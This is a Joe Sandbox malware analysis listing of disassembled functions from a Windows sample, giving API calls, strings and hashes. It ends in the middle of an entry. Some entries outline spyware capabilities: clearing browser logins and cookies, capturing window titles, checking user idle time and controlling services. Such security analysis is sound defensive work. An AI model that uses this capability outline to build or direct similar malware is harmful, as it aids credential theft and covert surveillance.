Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E

Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
GetProcAddress.KERNEL32(00000000), ref: 004014C0

Strings

User32.dll, xrefs: 004014B4
GetLastInputInfo, xrefs: 004014AF

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F

Function 0217A26B Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0217A2F6
__alldvrm.LIBCMT ref: 0217A4F7
__alldvrm.LIBCMT ref: 0217A519

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 1f5093d525d66a8c77a7a6d48f25c6de002bd88e4623d7d1b5926d2fba8dadfa
Instruction ID: 59656528db2de5a584e1bd37bccf41cf864a09af3cc5bf7800afa9b7ddd0f70e
Opcode Fuzzy Hash: 1f5093d525d66a8c77a7a6d48f25c6de002bd88e4623d7d1b5926d2fba8dadfa
Instruction Fuzzy Hash: 6AA159729843859FDB25CF28C8907BEBBF5EF95310F18416DE9959B280C3359941CB51

Function 0214C8F6 Relevance: 6.2, APIs: 4, Instructions: 214registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,0046CAE0,00000000,00020019,?), ref: 0214C918
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0214C95C

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: EnumOpen
String ID:
API String ID: 3231578192-0
Opcode ID: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
Instruction ID: 72662ffa1d6e617c31073af376bb63093f0f729455dec6e045de90d5e1038381
Opcode Fuzzy Hash: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
Instruction Fuzzy Hash: 028122311583459FD325FB14D850EEFB7EAFF94700F10492EA59982190EF70AA49CFA6

Function 02186E81 Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02186FB0

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
Instruction ID: d067f0c4c2815047d4b8a0250b548612f32d6286b51f156770257faa547fcb68
Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
Instruction Fuzzy Hash: 04411B32AC02906EDF25BF788CD46AE7A7EEF85734F154225F428D6290DB74C9418EA1

Function 02141DC6 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 02141DF3
IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 02141EBF
SetLastError.KERNEL32(0000007F), ref: 02141EE1
SetLastError.KERNEL32(0000007E,02142157), ref: 02141EF8

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorHugeLastRead
String ID:
API String ID: 3239643929-0
Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
Instruction ID: 31038ba42e9f9b8ebed4b9a09e76b2b07949d44f347867c10a2b702a26e61e1b
Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
Instruction Fuzzy Hash: 7C41AA75244301EFE725CF18DC84B66B7E4FF48619F10082DE95E97691EB70E885CB10

Function 00411B5F Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 00411B8C
IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 00411C58
SetLastError.KERNEL32(0000007F), ref: 00411C7A
SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorHugeLastRead
String ID:
API String ID: 3239643929-0
Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99

Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0040C021
Sleep.KERNEL32(00001388), ref: 0040C0A9

Strings

Cleared browsers logins and cookies., xrefs: 0040C0F5
[Cleared browsers logins and cookies.], xrefs: 0040C0E4

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
API String ID: 3472027048-1236744412
Opcode ID: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
Opcode Fuzzy Hash: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF

Function 02142942 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0214395F: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 0214397B
Part of subcall function 0214395F: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 02143994
Part of subcall function 0214395F: RegCloseKey.ADVAPI32(?), ref: 0214399F

Sleep.KERNEL32(00000BB8), ref: 021429E1

Strings

8SG, xrefs: 02142965
exepath, xrefs: 0214296A, 021429AA, 02142A2B
hdF, xrefs: 02142952

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseOpenQuerySleepValue
String ID: 8SG$exepath$hdF
API String ID: 4119054056-3379396883
Opcode ID: 9c934b3bbd26c49a5d18c555ac76dc8b6d39d276172ca4705fc493b63465aa74
Instruction ID: c14ac90631f1d394abd589de9c1cf58db1f8636a583a5659ddd3fdc6b5b5b485
Opcode Fuzzy Hash: 9c934b3bbd26c49a5d18c555ac76dc8b6d39d276172ca4705fc493b63465aa74
Instruction Fuzzy Hash: C221F591B803142FDA25BB746C04B7F724F8B81310F50457AFD0AD72C2DF789D498AA9

Function 02135706 Relevance: 6.1, APIs: 4, Instructions: 77windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 02135726
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 021357D6
TranslateMessage.USER32(?), ref: 021357E5
DispatchMessageA.USER32(?), ref: 021357F0
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 021358A8
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 021358E0

Part of subcall function 02134D08: send.WS2_32(?,00000000,00000000,00000000), ref: 02134D9D

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID:
API String ID: 2956720200-0
Opcode ID: bf81b510bea379b255de1da5256bd247ebd6881c13568abd38d214002f13ca8b
Instruction ID: bc30b37c463e90c3883185597d77128d1e3595f8dfcc0c124fe5d5a9f863bf33
Opcode Fuzzy Hash: bf81b510bea379b255de1da5256bd247ebd6881c13568abd38d214002f13ca8b
Instruction Fuzzy Hash: 4A217471544301EBCB15FB74CD498AE77ABAF85710F900A28F91683195DB34DA09CF51

Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594

Sleep.KERNEL32(000001F4), ref: 0040A573
Sleep.KERNEL32(00000064), ref: 0040A5FD

Strings

[ , xrefs: 0040A58F
], xrefs: 0040A57B

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
Opcode Fuzzy Hash: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB

Function 0214AEDF Relevance: 6.1, APIs: 4, Instructions: 67serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002), ref: 0214AEEF
OpenServiceW.ADVAPI32(00000000,00000000,00000002), ref: 0214AF03
CloseServiceHandle.ADVAPI32(00000000), ref: 0214AF10
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0214AF45

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Service$Open$ChangeCloseConfigHandleManager
String ID:
API String ID: 110783151-0
Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
Instruction ID: ed27034be082b16013c601e9f6dd769a4472eb9264e232d3f0e654faf82e875a
Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
Instruction Fuzzy Hash: 400122B21C9224BADB115A289C19E7F3B6CDF42671F010315F929921C1DF60CE0186A4

Function 0214BA66 Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON

Download Yara Rule

APIs

GetSystemTimes.KERNEL32(?,?,?), ref: 0214BA7C
Sleep.KERNEL32(000003E8), ref: 0214BA87
GetSystemTimes.KERNEL32(?,?,?), ref: 0214BA9C
__aulldiv.LIBCMT ref: 0214BB03

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: SystemTimes$Sleep__aulldiv
String ID:
API String ID: 188215759-0
Opcode ID: d15d48406ae4fcab4babe0330b0c5b8fee90212b63ea7519043b707935f9efa1
Instruction ID: a0da7e3d1c42385a6818b69f62f37b9f900bd8b868d4a8ab6c41e8e99a1a653b
Opcode Fuzzy Hash: d15d48406ae4fcab4babe0330b0c5b8fee90212b63ea7519043b707935f9efa1
Instruction Fuzzy Hash: 80116076A483586FC314FAB4CC94DAB7BADEBC4394F440E39B54A82054EF25D6088AA1

Function 0041B7FF Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON

Download Yara Rule

APIs

GetSystemTimes.KERNEL32(?,?,?), ref: 0041B815
Sleep.KERNEL32(000003E8), ref: 0041B820
GetSystemTimes.KERNEL32(?,?,?), ref: 0041B835
__aulldiv.LIBCMT ref: 0041B89C

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: SystemTimes$Sleep__aulldiv
String ID:
API String ID: 188215759-0
Opcode ID: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
Instruction ID: 72b4c32e7059473e424b83a6cc96647c38f9827b21069785d395d2d8421d6a64
Opcode Fuzzy Hash: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
Instruction Fuzzy Hash: B0113D7A5083456BD304FAB5CC85DEB7BACEAC4654F040A3EF54A82051FE68EA4886A5

Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568

Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169

Function 021787CD Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,02178774,?,00000000,00000000,00000000,?,02178AA0,00000006,0045A3D4), ref: 021787FF
GetLastError.KERNEL32(?,02178774,?,00000000,00000000,00000000,?,02178AA0,00000006,0045A3D4,0045F160,0045F168,00000000,00000364,?,0217854E), ref: 0217880B
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,02178774,?,00000000,00000000,00000000,?,02178AA0,00000006,0045A3D4,0045F160,0045F168,00000000), ref: 02178819

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
Instruction ID: bc8e47dd638bf4ff3d11806ce64d2c82784769cc9677b952555a029765a8ce5b
Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
Instruction Fuzzy Hash: A301AC33686322EBC7214F69DC48A567778AF85AA2B120634FD1AD7151D730D900C7D4

Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8

Function 0214C6EC Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,02134396,00465E74), ref: 0214C705
GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,02134396,00465E74), ref: 0214C719
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,02134396,00465E74), ref: 0214C73E
CloseHandle.KERNEL32(00000000,?,00000000,02134396,00465E74), ref: 0214C74C

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
Instruction ID: a21e37781b87692dadfa66a77db30682db414da012c5b8b84410905718b56135
Opcode Fuzzy Hash: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
Instruction Fuzzy Hash: F8F096B5282318BFF6112B25ACC4FBB375DEB866AAF10063AFD02922C1DF258C059575

Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4D7
CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E74), ref: 0041C4E5

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
Opcode Fuzzy Hash: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A

Function 0214D002 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

AllocConsole.KERNEL32 ref: 0214D00B
GetConsoleWindow.KERNEL32 ref: 0214D011
ShowWindow.USER32(00000000,00000000), ref: 0214D024
SetConsoleOutputCP.KERNEL32(000004E4), ref: 0214D049

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Console$Window$AllocOutputShow
String ID:
API String ID: 4067487056-0
Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
Instruction ID: c68961792389e2820df183bbc97c3d4512a7e218eeb2356c181caf00d00429d1
Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
Instruction Fuzzy Hash: AB0184B1AC1304AFDA00F7F09D49F6D776DAB44701F500426BA08A70C1EBB599154B6A

Function 02169ACA Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 02169AE1

Part of subcall function 0216A119: ___BuildCatchObjectHelper.LIBVCRUNTIME ref: 0216A148
Part of subcall function 0216A119: ___AdjustPointer.LIBCMT ref: 0216A163

_UnwindNestedFrames.LIBCMT ref: 02169AF8
___FrameUnwindToState.LIBVCRUNTIME ref: 02169B0A
CallCatchBlock.LIBVCRUNTIME ref: 02169B2E

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction ID: 32226439d99d4b4eca767309a46d4d32c58ad67ffe9131e60da3553e509f0d14
Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction Fuzzy Hash: A801C232040109ABCF129F59CC48EEE7BBAAF88754F058015F91866120D772E871EFA0

Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0043987A

Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC

_UnwindNestedFrames.LIBCMT ref: 00439891
___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
CallCatchBlock.LIBVCRUNTIME ref: 004398C7

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5

Function 0214AE11 Relevance: 6.0, APIs: 4, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040), ref: 0214AE20
OpenServiceW.ADVAPI32(00000000,00000000,00000040), ref: 0214AE34
CloseServiceHandle.ADVAPI32(00000000), ref: 0214AE41
ControlService.ADVAPI32(00000000,00000002,?), ref: 0214AE50

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Service$Open$CloseControlHandleManager
String ID:
API String ID: 1243734080-0
Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
Instruction ID: 231013befbd50da4ae2bf8d774fb3d6576dda936f35f7f08f515f7e0b9ce836c
Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
Instruction Fuzzy Hash: FEF0C271580218ABD611AB249C49EBF3B6CDF45A61F400425FE09A2181DF38CD0599E4

Function 0214AE78 Relevance: 6.0, APIs: 4, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040), ref: 0214AE87
OpenServiceW.ADVAPI32(00000000,00000000,00000040), ref: 0214AE9B
CloseServiceHandle.ADVAPI32(00000000), ref: 0214AEA8
ControlService.ADVAPI32(00000000,00000003,?), ref: 0214AEB7

Memory Dump Source

